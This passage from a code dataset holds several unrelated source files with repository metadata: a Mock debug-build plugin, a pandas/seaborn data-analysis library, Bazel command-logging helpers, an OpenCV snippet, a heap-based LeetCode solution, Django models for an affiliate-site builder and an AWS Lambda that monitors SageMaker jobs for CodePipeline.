\"/usr/share/mock-O0g3-plugin/strip-O0g3\",\n }\n self.suffix=\"O0g3\"\n \n # See http://www.redhat.com/archives/rpm-list/2003-February/msg00174.html\n root.yumInstall(\"redhat-rpm-config\")\n\n root.addHook(\"prebuild\", self.prebuild)\n root.addHook(\"postbuild\", self.postbuild)\n\n\n decorate(traceLog())\n def prebuild(self):\n self.modifySpec()\n for k in self.O0g3s:\n self.replace(k)\n\n decorate(traceLog())\n def postbuild(self):\n for k in self.O0g3s:\n self.revert(k)\n\n def modifySpec(self):\n getLog().info(\"Modify the spec file\")\n root = self.root\n specs = glob.glob(root.makeChrootPath(root.builddir, \"SPECS\", \"*.spec\"))\n spec = specs[0]\n chrootspec = spec.replace(root.makeChrootPath(), '') # get rid of rootdir prefix\n root.doChroot(\n [\"sed\", \"-i\", \n \"-e\", 's/^Release: .*/\\\\0.%s/'%(self.suffix), \n \"-e\", \"1i %define debug_package %{nil}\",\n \"-e\", \"1i %define debug_packages %{nil}\",\n \"-e\", \"1i %define __strip :\",\n chrootspec],\n shell=False,\n logger=root.build_log, \n timeout=0,\n uid=root.chrootuid,\n gid=root.chrootgid,\n )\n\n def makeOriginalPath(self, cmd):\n return self.root.makeChrootPath(\"/usr/bin\" + \"/\" + cmd)\n def makeBackupPath(self, cmd):\n return self.root.makeChrootPath(\"/usr/bin\" + \"/\" + \"_\" + cmd)\n\n def replace(self, cmd):\n getLog().info(\"Replace \" + cmd)\n root = self.root\n original = self.makeOriginalPath(cmd)\n backup = self.makeBackupPath(cmd)\n f = open(original, mode='r')\n l = f.readline() \n f.close()\n if l != \"#!/bin/bash\":\n try:\n root.uidManager.becomeUser(0, 0)\n getLog().info(\"mv \" + original + \" \" + backup)\n mockbuild.util.do([\"/bin/mv\", original, backup],\n shell=False)\n getLog().info(\"cp \" + self.O0g3s[cmd] + \" \" + original)\n mockbuild.util.do(\n [\"/bin/cp\", \n self.O0g3s[cmd],\n original],\n shell=False)\n finally:\n root.uidManager.restorePrivs()\n def revert(self, cmd):\n getLog().info(\"Revert \" + cmd)\n root = self.root\n original = self.makeOriginalPath(cmd)\n backup = self.makeBackupPath(cmd)\n if os.path.exists(backup):\n try:\n root.uidManager.becomeUser(0, 0)\n getLog().info(\"mv \" + backup + \" \" + original)\n mockbuild.util.do([\"/bin/mv\", backup, original],\n shell=False)\n finally:\n root.uidManager.restorePrivs()\n\n# mock --no-cleanup-after --resultdir=/tmp --enable-plugin=O0g3 -r epel-5-x86_64 --rebuild /srv/sources/attic/cradles/ftp.redhat.com/mirror/linux/enterprise/5Server/en/os/SRPMS/device-mapper-multipath-0.4.7-46.el5.src.rpm \n","repo_name":"hackerlank/svn-svn.code.sf.net-p-srpmix-code-","sub_path":"mock-O0g3-plugin/O0g3.py","file_name":"O0g3.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5453029508","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis file is part of NANOLIB\r\n\r\n\r\nNANOLIB was primarily developed at Nanosense by:\r\n Shidiq Nur Hidayat (s.hidayat@nanosense-id.com)\r\n\r\nCreated on Tue Jul 14 18:23:51 2020\r\n\r\n@author: Shidiq Nur Hidayat\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport warnings\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom nanolib.utils import customplot, train_test_split\r\n\r\n\r\nclass Stats:\r\n \"\"\"\r\n ===============================\r\n Data Manipulation and statistic\r\n ===============================\r\n\r\n Stat(df, feature=int, key=string)\r\n\r\n Methods:\r\n\r\n - print_()\r\n - stats_()\r\n - corr_()\r\n - boxplot_()\r\n - matrixplot_()\r\n - swarmplot_()\r\n - stripplot_()\r\n - corrplot_(adj_left, adj_bottom, size)\r\n - dataframe_()\r\n - xy_()\r\n - xy_encoder(config=None)\r\n - xy_binarize()\r\n - signalmean(rot, adj_left, adj_bottom, scale)\r\n - signalminmaxmean()\r\n - saveinfo(file)\r\n - xy_split(encoder=False, binarized=False, test_size=0.2, random_state=None, config=None)\r\n - hierarchical_clustering(max_d)\r\n\r\n \"\"\"\r\n\r\n def __init__(self, df, feature=2, key='label'):\r\n self.feature = feature\r\n self.key = key\r\n featurename = list(df)[0:self.feature]\r\n featurename.append(self.key)\r\n self.df = df[featurename]\r\n self.df = self.df.sort_values(by=[self.key])\r\n self.X = self.df.values[:, 0:self.feature].astype(float)\r\n self.y = self.df[self.key].values\r\n self.case = None\r\n\r\n def __repr__(self):\r\n return 'You must understand your data in order to get the best results.\\n'\r\n\r\n def print_(self):\r\n # Dimensions of Your Data\r\n print('Understand Your Data\\n\\n')\r\n print(f'Dimensions of Your Data\\n'\r\n f'Number of rows : {self.df.shape[0]}\\n'\r\n f'Number of columns : {self.df.shape[1]}\\n\\n')\r\n\r\n # Data Type For Each Attribute\r\n print(f'Data Type For Each Attribute\\n'\r\n f'{self.df.dtypes}\\n\\n')\r\n\r\n # Descriptive Statistics\r\n print(f'Descriptive Statistics\\n'\r\n f'{self.df.describe()}\\n\\n')\r\n\r\n # Class Distribution\r\n print(f'Class Distribution\\n'\r\n f'{self.df.groupby(self.key).size()}\\n\\n')\r\n\r\n # Correlations Between Attributes\r\n pd.set_option('display.width', 100)\r\n pd.set_option('precision', 3)\r\n correlations = self.df.corr(method='pearson')\r\n print(f'Correlations Between Attributes\\n'\r\n f'{correlations}\\n\\n')\r\n\r\n # Skew of Univariate Distributions\r\n print(f'Skew of Univariate Distributions\\n'\r\n f'{self.df.skew()}\\n\\n')\r\n\r\n def stats_(self):\r\n return self.df.describe()\r\n\r\n def corr_(self):\r\n return self.df.corr(method='pearson')\r\n\r\n def boxplot_(self, separate=False, adj_left=.1, adj_bottom=.1):\r\n if separate:\r\n params = {'font.family': 'serif',\r\n 'font.serif': 'DejaVu Serif',\r\n 'xtick.labelsize': 20,\r\n 'ytick.labelsize': 20,\r\n 'axes.labelsize': 28,\r\n 'figure.figsize': [10.72, 8.205],\r\n 'legend.loc': 'best',\r\n 'legend.fontsize': 18,\r\n 'legend.fancybox': False}\r\n matplotlib.rcParams.update(params)\r\n self.df.groupby(self.key).boxplot()\r\n else:\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n dd = pd.melt(self.df, id_vars=[self.key], value_vars=list(self.df)[0:self.feature], var_name='Features')\r\n ax = sns.boxplot(x=self.key, y='value', data=dd, hue='Features')\r\n return ax.get_figure()\r\n\r\n def matrixplot_(self, adj_left=.1, adj_bottom=.1):\r\n fig, _ = customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n matplotlib.pyplot.close()\r\n fig = sns.pairplot(self.df, hue=self.key)\r\n return fig\r\n\r\n def swarmplot_(self, adj_left=.1, adj_bottom=.1):\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n dd = pd.melt(self.df, [self.key], var_name='Features')\r\n ax = sns.swarmplot(x='Features', y='value', data=dd, hue=self.key)\r\n return ax.get_figure()\r\n\r\n def stripplot_(self, adj_left=.1, adj_bottom=.1):\r\n dd = pd.melt(self.df, [self.key], var_name='Features')\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n sns.stripplot(x=\"value\", y=\"Features\", hue=self.key,\r\n data=dd, dodge=True, jitter=True,\r\n alpha=.25, zorder=1)\r\n ax = sns.pointplot(x=\"value\", y=\"Features\", hue=self.key,\r\n data=dd, dodge=.532, join=False, palette=\"dark\",\r\n markers=\"d\", scale=.75, ci=None)\r\n handles, labels = ax.get_legend_handles_labels()\r\n n = len(np.unique(self.y))\r\n ax.legend(handles[0:n], labels[0:n], loc='best',\r\n handletextpad=0, columnspacing=1,\r\n frameon=True)\r\n return ax.get_figure()\r\n\r\n def corrplot_(self, adj_left=.1, adj_bottom=.1, size=20):\r\n corr_ = self.df.corr(method='pearson')\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n ax = sns.heatmap(corr_, vmax=1, vmin=-1, cmap='YlGnBu', annot=True, annot_kws={\"size\": size})\r\n return ax.get_figure()\r\n\r\n def dataframe_(self):\r\n return self.df\r\n\r\n def xy_(self):\r\n return self.X, self.y\r\n\r\n def xy_encoder(self, config=None):\r\n from sklearn.preprocessing import LabelEncoder\r\n \r\n if config is None:\r\n le = LabelEncoder()\r\n le.fit(list(self.df[self.key].unique()))\r\n y = le.transform(self.y)\r\n print(self.df[self.key].unique())\r\n print(np.unique(y))\r\n else:\r\n from sklearn.utils import column_or_1d\r\n \r\n class MyLabelEncoder(LabelEncoder):\r\n \r\n def fit(self, y):\r\n y = column_or_1d(y, warn=True)\r\n self.classes_ = pd.Series(y).unique()\r\n return self\r\n \r\n le = MyLabelEncoder()\r\n le.fit(config)\r\n y = le.transform(self.y)\r\n warnings.warn('User encoder activated')\r\n \r\n return self.X, y\r\n\r\n def xy_binarize(self):\r\n from sklearn.preprocessing import label_binarize\r\n y = label_binarize(self.y, classes=list(np.unique(self.y)))\r\n print(self.df[self.key].unique())\r\n return self.X, y\r\n\r\n def signalmean(self, rot=90, adj_left=0.14, adj_bottom=0.24, scale=False, median=False):\r\n label = self.df[self.key].unique()\r\n nama = list(self.df)[0:self.feature]\r\n mean_df = pd.DataFrame()\r\n scaling = StandardScaler()\r\n scaling.fit(self.df.values[:, 0:self.feature].astype(float))\r\n\r\n for i, item in enumerate(label):\r\n ind = self.df[self.key].isin([item])\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n \r\n if scale:\r\n temp[nama] = scaling.transform(temp[nama])\r\n\r\n if median:\r\n temp = temp.apply(np.median, axis=0)\r\n else:\r\n temp = temp.apply(np.mean, axis=0)\r\n\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n mean_df = mean_df.append(temp)\r\n\r\n mean_df = mean_df.transpose()\r\n params = {'font.family': 'serif',\r\n 'font.serif': 'DejaVu Serif',\r\n 'xtick.labelsize': 20,\r\n 'ytick.labelsize': 20,\r\n 'axes.labelsize': 28,\r\n 'figure.figsize': [10.72, 8.205],\r\n 'legend.loc': 'best',\r\n 'legend.fontsize': 18,\r\n 'legend.fancybox': False}\r\n matplotlib.rcParams.update(params)\r\n ax = mean_df[label].plot(kind='bar', legend=True, rot=rot)\r\n ax.set_xlabel('Features')\r\n ax.set_ylabel('Values')\r\n plt.subplots_adjust(left=adj_left, bottom=adj_bottom, right=.97, top=.97)\r\n\r\n return mean_df, ax.get_figure()\r\n\r\n def signalminmaxmean(self):\r\n label = self.df[self.key].unique()\r\n nama = list(self.df)[0:self.feature]\r\n minDF = pd.DataFrame()\r\n maxDF = pd.DataFrame()\r\n meanDF = pd.DataFrame()\r\n stdDF = pd.DataFrame()\r\n\r\n for i, item in enumerate(label):\r\n ind = self.df[self.key].isin([item])\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.min, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n minDF = minDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.max, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n maxDF = maxDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.mean, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n meanDF = meanDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.std, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n stdDF = stdDF.append(temp)\r\n\r\n minDF = minDF.transpose()\r\n maxDF = maxDF.transpose()\r\n meanDF = meanDF.transpose()\r\n stdDF = stdDF.transpose()\r\n\r\n return minDF, meanDF, maxDF, stdDF\r\n\r\n def saveinfo(self, file='info.txt'):\r\n import io\r\n from contextlib import redirect_stdout\r\n import os\r\n\r\n path_ = os.path.dirname(file)\r\n if not os.path.exists(path_):\r\n os.makedirs(path_)\r\n\r\n f = io.StringIO()\r\n\r\n with open(file, 'w') as f:\r\n with redirect_stdout(f):\r\n self.print_()\r\n return f'Information saved in {file}'\r\n\r\n def xy_split(self, encoder=False, binarized=False, test_size=0.2, random_state=None, config=None):\r\n if encoder:\r\n x, y = self.xy_encoder(config=config)\r\n elif binarized:\r\n x, y = self.xy_binarize()\r\n else:\r\n x, y = self.xy_()\r\n\r\n xtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=test_size, random_state=random_state)\r\n \r\n return xtrain, xtest, ytrain, ytest\r\n\r\n def hierarchical_clustering(self, max_d=0):\r\n from scipy.cluster.hierarchy import dendrogram, linkage\r\n X = self.X\r\n linked = linkage(X, 'ward')\r\n labelList = np.arange(0, X.shape[0])\r\n fig, ax = customplot()\r\n dendrogram(linked,\r\n truncate_mode='lastp',\r\n p=X.shape[0],\r\n orientation='top',\r\n labels=labelList,\r\n distance_sort='descending',\r\n show_leaf_counts=True)\r\n plt.axhline(y=max_d, c='k')\r\n return ax.get_figure()\r\n\r\n\r\nclass KennardStone:\r\n \"\"\"\r\n =============================\r\n Kennard-Stone Algorithm Class\r\n =============================\r\n\r\n KennardStone(k)\r\n\r\n Methods:\r\n - fit(x, y)\r\n - datasplit()\r\n - print()\r\n\r\n \"\"\"\r\n\r\n def __init__(self, **options):\r\n self.X = None\r\n self.y = None\r\n self.k = options.get('k', 0)\r\n self.X_train = list()\r\n self.X_val = list()\r\n self.y_train = list()\r\n self.y_val = list()\r\n self.selectedsample = list()\r\n self.remainingsample = list()\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}'\r\n\r\n def fit(self, x, y):\r\n self.X = x\r\n self.y = y\r\n x_variables = self.X\r\n k = self.k\r\n x_variables = np.array(x_variables)\r\n original_x = x_variables\r\n distance_to_average = ((x_variables - np.tile(x_variables.mean(axis=0), (x_variables.shape[0], 1))) ** 2).sum(\r\n axis=1)\r\n max_distance_sample_number = np.where(distance_to_average == np.max(distance_to_average))\r\n max_distance_sample_number = max_distance_sample_number[0][0]\r\n selected_sample_numbers = list()\r\n selected_sample_numbers.append(max_distance_sample_number)\r\n remaining_sample_numbers = np.arange(0, x_variables.shape[0], 1)\r\n x_variables = np.delete(x_variables, selected_sample_numbers, 0)\r\n remaining_sample_numbers = np.delete(remaining_sample_numbers, selected_sample_numbers, 0)\r\n for iteration in range(1, k):\r\n selected_samples = original_x[selected_sample_numbers, :]\r\n min_distance_to_selected_samples = list()\r\n for min_distance_calculation_number in range(0, x_variables.shape[0]):\r\n distance_to_selected_samples = (\r\n (selected_samples - np.tile(x_variables[min_distance_calculation_number, :],\r\n (selected_samples.shape[0], 1))) ** 2).sum(axis=1)\r\n min_distance_to_selected_samples.append(np.min(distance_to_selected_samples))\r\n max_distance_sample_number = np.where(\r\n min_distance_to_selected_samples == np.max(min_distance_to_selected_samples))\r\n max_distance_sample_number = max_distance_sample_number[0][0]\r\n selected_sample_numbers.append(remaining_sample_numbers[max_distance_sample_number])\r\n x_variables = np.delete(x_variables, max_distance_sample_number, 0)\r\n remaining_sample_numbers = np.delete(remaining_sample_numbers, max_distance_sample_number, 0)\r\n\r\n self.selectedsample = selected_sample_numbers\r\n self.remainingsample = remaining_sample_numbers\r\n return self.selectedsample, self.remainingsample\r\n\r\n def datasplit(self):\r\n self.X_train = self.X[self.remainingsample, :]\r\n self.y_train = self.y[self.remainingsample]\r\n\r\n self.X_val = self.X[self.selectedsample, :]\r\n self.y_val = self.y[self.selectedsample]\r\n\r\n dist_y_train = pd.DataFrame(self.y_train, columns=['Training'])['Training'].value_counts()\r\n dist_y_val = pd.DataFrame(self.y_val, columns=['Validation'])['Validation'].value_counts()\r\n print(dist_y_train)\r\n print(dist_y_val)\r\n\r\n return self.X_train, self.X_val, self.y_train, self.y_val\r\n\r\n def print(self):\r\n dist_y_train = pd.DataFrame(self.y_train, columns=['Training'])['Training'].value_counts()\r\n dist_y_val = pd.DataFrame(self.y_val, columns=['Validation'])['Validation'].value_counts()\r\n print(dist_y_train)\r\n print(dist_y_val)\r\n\r\n\r\nclass StatsMethod:\r\n \"\"\"\r\n =========================================================\r\n Statistic Hypothesis testing and Five-Number of statistic\r\n =========================================================\r\n\r\n StatsMethod()\r\n\r\n Methods:\r\n\r\n - nonparamsignificance(x1, x2)\r\n \r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.d1 = None\r\n self.d2 = None\r\n\r\n def nonparamsignificance(self, *arrays):\r\n from scipy.stats import mannwhitneyu, kruskal, wilcoxon\r\n import pingouin as pg\r\n\r\n self.d1 = arrays[0]\r\n self.d2 = arrays[1]\r\n metode = []\r\n p = []\r\n stat = []\r\n ket = []\r\n\r\n def keterangan(pval):\r\n alpha = 0.05\r\n if pval > alpha:\r\n return 'Same distribution (fail to reject H0)'\r\n else:\r\n return 'Different distribution (reject H0)'\r\n\r\n metode.append('Mann-Whitney U test')\r\n a, b = mannwhitneyu(self.d1, self.d2)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n metode.append('Kruskal-Wallis H Test')\r\n a, b = kruskal(self.d1, self.d2)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n metode.append('Wilcoxon')\r\n a, b = wilcoxon(self.d1, self.d2, correction=True)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n results = {\r\n 'Method': metode,\r\n 'Statistic': stat,\r\n 'p-value': p,\r\n 'Conclusion': ket,\r\n }\r\n results = pd.DataFrame(results)\r\n print('5-Number of statistic for D1:')\r\n self.fivenumberplus(self.d1)\r\n\r\n print('5-Number of statistic for D2:')\r\n self.fivenumberplus(self.d2)\r\n\r\n print(results)\r\n print(pg.wilcoxon(self.d1, self.d2, tail='two-sided'))\r\n return results\r\n\r\n @staticmethod\r\n def fivenumberplus(x):\r\n from numpy import percentile\r\n Q = percentile(x, [25, 50, 75])\r\n print('Min : %.3f' % x.min())\r\n print('Q1 : %.3f' % Q[0])\r\n print('Median: %.3f' % Q[1])\r\n print('Q3 : %.3f' % Q[2])\r\n print('Max : %.3f' % x.max())\r\n print('Mean : %.3f' % x.mean())\r\n\r\n @staticmethod\r\n def multisignificancetest(A1, A2):\r\n\r\n def func(d1, d2, alpha=0.05):\r\n from scipy.stats import kruskal\r\n _, p = kruskal(d1, d2)\r\n if p > alpha:\r\n # same distribution (fail to reject H0)\r\n return 0\r\n else:\r\n # different distribution (reject H0 = H1)\r\n return 1\r\n\r\n m, n = A1.shape\r\n\r\n result = np.zeros((n, n))\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n temp = func(A1[:, i], A2[:, j])\r\n result[i, j] = temp\r\n\r\n label = [f'F{i}' for i in range(n)]\r\n result = pd.DataFrame(data=result, index=label, columns=label)\r\n\r\n plt.figure(figsize=(7, 7))\r\n sns.set(font_scale=2.0)\r\n ax = sns.heatmap(result, annot=True, cbar=False, annot_kws={'size': 20})\r\n\r\n return result, ax.get_figure()\r\n","repo_name":"Shidiq/nanolib","sub_path":"nanolib/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":18039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16087099780","text":"def execute_and_check_result(ctx, command, **kwargs):\n res = ctx.execute(command, **kwargs)\n if res.return_code != 0:\n fail(\"\"\"Failed to execute command: `{command}`{newline}Exit Code: {code}{newline}STDERR: {stderr}{newline}\"\"\".format(\n command = command,\n code = res.return_code,\n stderr = res.stderr,\n newline = \"\\n\"\n ))\n return res\n\n##\n# Runs a command and logs the result into a separate file\n#\ndef execute_log_action(repo_ctx, log_file_name, action, should_fail = False, **kwargs):\n cmd = \" \".join(action)\n repo_ctx.report_progress(\"Running {cmd}\".format(cmd = cmd))\n\n environment_str = \"\"\n if \"environment\" in kwargs:\n environment_str = \"\\nENV: {env}\".format(env = kwargs[\"environment\"])\n\n workdir_str = \"\"\n if \"working_directory\" in kwargs:\n workdir_str = \"\\nENV: {workdir}\".format(workdir = kwargs[\"working_directory\"])\n\n sh_path = repo_ctx.path(\"{log_file_name}.sh\".format(log_file_name = log_file_name))\n shell_script_lines = [\n \"#!/bin/bash\",\n \"unset GEM_HOME\",\n \"unset GEM_PATH\",\n cmd,\n \"\",\n ]\n exec_text = \"\\n\".join(shell_script_lines)\n\n repo_ctx.file(sh_path.basename, exec_text)\n \n res = repo_ctx.execute([\"%s\" % sh_path], **kwargs)\n result_str = \"cmd: {cmd}{env_str}{workdir_str}\\nRETCODE: {code}\\nSTDOUT:{stdout}\\nSTDERR:{stderr}\".format(\n cmd = cmd,\n env_str = environment_str,\n workdir_str = workdir_str,\n code = res.return_code,\n stdout = res.stdout,\n stderr = res.stderr,\n )\n\n if log_file_name:\n log_file_path = \"logs/commands/{log_file_name}\".format(log_file_name = log_file_name)\n repo_ctx.file(log_file_path, result_str)\n\n if should_fail and res.return_code:\n fail(\"Failed: {result_str}\". format(result_str))\n\n return res, result_str\n","repo_name":"googleapis/gapic-generator-ruby","sub_path":"rules_ruby_gapic/ruby/private/utils.bzl","file_name":"utils.bzl","file_ext":"bzl","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"40021154155","text":"# http://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_image_display/py_image_display.html#display-image\n\nimport numpy as np\nimport cv2\n\n# Load an color image in grayscale\nimg = cv2.imread('panel.jpg',0)\n\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\n\ncv2.imshow('image',img)\nk = cv2.waitKey(0)\nif k == 27: # wait for ESC key to exit\n cv2.destroyAllWindows()\nelif k == ord('s'): # wait for 's' key to save and exit\n cv2.imwrite('panelgray.png',img)\n cv2.destroyAllWindows()","repo_name":"millerj870/onrsfrp2018","sub_path":"test-image.py","file_name":"test-image.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23240837425","text":"# 给定整数数组 nums 和整数 k,请返回数组中第 k 个最大的元素。\n#\n# 请注意,你需要找的是数组排序后的第 k 个最大的元素,而不是第 k 个不同的元素。\n\n# 堆\nimport heapq\nclass Solution:\n def findKthLargest(self, nums: List[int], k: int) -> int:\n n = len(nums)\n hp = nums[:k]\n heapq.heapify(hp)\n for i in range(k, n):\n if nums[i] > hp[0]:\n heapq.heappush(hp, nums[i])\n if len(hp) > k:\n heapq.heappop(hp)\n return hp[0]","repo_name":"vandeppce/algorithm","sub_path":"1.array/215*FindKthLargest.py","file_name":"215*FindKthLargest.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15750968098","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n name = models.CharField(max_length=255, null=True)\n email = models.EmailField(unique=True)\n key = models.CharField(max_length=100000000000000000000000000000000000000000000000000000)\n purchased = models.BooleanField(default=False)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = ['username', 'name', 'key', 'purchased']\n\nclass Product(models.Model):\n name = models.CharField(max_length=1000)\n link = models.URLField()\n user = models.ForeignKey(User, blank=True, on_delete=models.CASCADE)\n is_active = models.BooleanField(default=True)\n description = models.TextField()\n image = models.ImageField(blank=True, null=True, upload_to='products/')\n\n def __str__(self):\n return \"Product \" + str(self.id)\n\nclass Website(models.Model):\n name = models.CharField(max_length=255, unique=True)\n # header_title = models.CharField(max_length=255, default='')\n # header_text = models.TextField(default='')\n image1 = models.ImageField(upload_to='carousel/', default='')\n image2 = models.ImageField(upload_to='carousel/', default='')\n image3 = models.ImageField(upload_to='carousel/', default='')\n products = models.ManyToManyField(Product, related_name=\"website_products\", blank=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.name","repo_name":"Nepul321/Affiliate-website-builder","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17920089990","text":"import boto3\nimport os\nimport json\nimport tempfile\nimport botocore\n\nfrom boto3.session import Session\n\nsagemaker = boto3.client('sagemaker')\ncode_pipeline = boto3.client('codepipeline')\n\nSSEKMSKeyId = os.environ['SSEKMSKeyIdIn']\n\n\ndef lambda_handler(event, context):\n try:\n \n previousStepEvent = read_job_info(event)\n print('[INFO]previousStepEvent info is:', previousStepEvent)\n jobName = previousStepEvent['job_name']\n print(\"[INFO]jobName is:\", jobName)\n \n \n eventText = event['CodePipeline.job']['data']['actionConfiguration']['configuration']['UserParameters']\n eventJson = json.loads(eventText)\n stage = eventJson['stage']\n print(\"[INFO]Stage is:\", stage)\n \n \n if stage == 'Training':\n name = jobName\n training_details = describe_training_job(name)\n status = training_details['TrainingJobStatus']\n print('[INFO]Training job is:', status)\n if status == 'Completed':\n #need to call success\n print('[SUCCESS]status is completed')\n print(training_details)\n s3_output_path = training_details['OutputDataConfig']['S3OutputPath']\n model_data_url = os.path.join(s3_output_path, name, 'output/model.tar.gz')\n event['message'] = 'Training job \"{}\" complete. Model data uploaded to \"{}\"'.format(name, model_data_url)\n event['model_data_url'] = model_data_url\n write_job_info_s3(event, training_details)\n put_job_success(event)\n elif status == 'Failed':\n #need to call failure\n print('[ERROR]status is failed')\n failure_reason = training_details['FailureReason']\n event['message'] = 'Training job failed. {}'.format(failure_reason)\n put_job_failure(event)\n elif status == 'InProgress':\n #need to call continue\n print('[INFO]status is still in process')\n continue_job_later(event, 'Training job still in process.') \n elif stage == 'Deployment':\n jobName = previousStepEvent['endpoint']\n print(\"[INFO]Deployment endpoint name is:\", jobName)\n endpoint_details = describe_endpoint(jobName)\n status = endpoint_details['EndpointStatus']\n print(\"[INFO]Deployment Status is:\", status)\n if status == 'InService':\n print('[SUCCESS]endpoint is in service')\n print(endpoint_details)\n event['message'] = 'Deployment completed for endpoint \"{}\".'.format(endpoint_details)\n put_job_success(event)\n elif status == 'Failed':\n failure_reason = endpoint_details['FailureReason']\n event['message'] = 'Deployment failed for endpoint \"{}\". {}'.format(jobName, failure_reason)\n elif status == 'RollingBack':\n event['message'] = 'Deployment failed for endpoint \"{}\", rolling back to previously deployed version.'.format(jobName)\n elif status == 'Creating':\n print('status is still in creating')\n continue_job_later(event, 'Endpoint Creation still in process.') \n event['status'] = status\n return event\n except Exception as e:\n print(e)\n event['message'] = str(e)\n put_job_failure(event)\n return 'failed'\n\n\ndef describe_training_job(name):\n \n try:\n response = sagemaker.describe_training_job(\n TrainingJobName=name\n )\n except Exception as e:\n print(e)\n print('[ERROR]Unable to describe training job.')\n raise(e)\n return response\n \ndef describe_endpoint(jobName):\n try:\n response = sagemaker.describe_endpoint(\n EndpointName=jobName\n )\n except Exception as e:\n print(e)\n print('[ERROR]Unable to describe endpoint.')\n raise(e)\n return response\n\ndef put_job_success(event):\n #need to add code to do the s3 upload of the information for the next stage.\n print('[INFO]Putting job success')\n print(event['message'])\n code_pipeline.put_job_success_result(jobId=event['CodePipeline.job']['id'])\n \ndef put_job_failure(event):\n \n print('[INFO]Putting job failure')\n print(event['message'])\n code_pipeline.put_job_failure_result(jobId=event['CodePipeline.job']['id'], failureDetails={'message': event['message'], 'type': 'JobFailed'})\n\ndef continue_job_later(event, message):\n \n \n # Use the continuation token to keep track of any job execution state\n # This data will be available when a new job is scheduled to continue the current execution\n continuation_token = json.dumps({'previous_job_id': event['CodePipeline.job']['id']})\n \n print('[INFO]Putting job continuation')\n print(message)\n code_pipeline.put_job_success_result(jobId=event['CodePipeline.job']['id'], continuationToken=continuation_token)\n\ndef read_job_info(event):\n\n tmp_file = tempfile.NamedTemporaryFile()\n\n objectKey = event['CodePipeline.job']['data']['inputArtifacts'][0]['location']['s3Location']['objectKey']\n print(\"[INFO]Object Key:\", objectKey)\n\n bucketname = event['CodePipeline.job']['data']['inputArtifacts'][0]['location']['s3Location']['bucketName']\n print(\"[INFO]Bucket Name:\", bucketname)\n\n artifactCredentials = event['CodePipeline.job']['data']['artifactCredentials']\n\n session = Session(aws_access_key_id=artifactCredentials['accessKeyId'],\n aws_secret_access_key=artifactCredentials['secretAccessKey'],\n aws_session_token=artifactCredentials['sessionToken'])\n \n \n s3 = session.resource('s3')\n\n obj = s3.Object(bucketname,objectKey)\n \n item = json.loads(obj.get()['Body'].read().decode('utf-8'))\n \n return item\n\ndef write_job_info_s3(event, writeData):\n\n objectKey = event['CodePipeline.job']['data']['outputArtifacts'][0]['location']['s3Location']['objectKey']\n\n bucketname = event['CodePipeline.job']['data']['outputArtifacts'][0]['location']['s3Location']['bucketName']\n\n artifactCredentials = event['CodePipeline.job']['data']['artifactCredentials']\n\n artifactName = event['CodePipeline.job']['data']['outputArtifacts'][0]['name']\n json_data = json.dumps(writeData, indent=4, sort_keys=True, default=str)\n\n print(json_data)\n\n session = Session(aws_access_key_id=artifactCredentials['accessKeyId'],\n aws_secret_access_key=artifactCredentials['secretAccessKey'],\n aws_session_token=artifactCredentials['sessionToken'])\n \n\n s3 = session.resource(\"s3\")\n #object = s3.Object(bucketname, objectKey + '/event.json')\n object = s3.Object(bucketname, objectKey)\n print(object)\n object.put(Body=json_data, ServerSideEncryption='aws:kms', SSEKMSKeyId=SSEKMSKeyId)\n print('[INFO]event written to 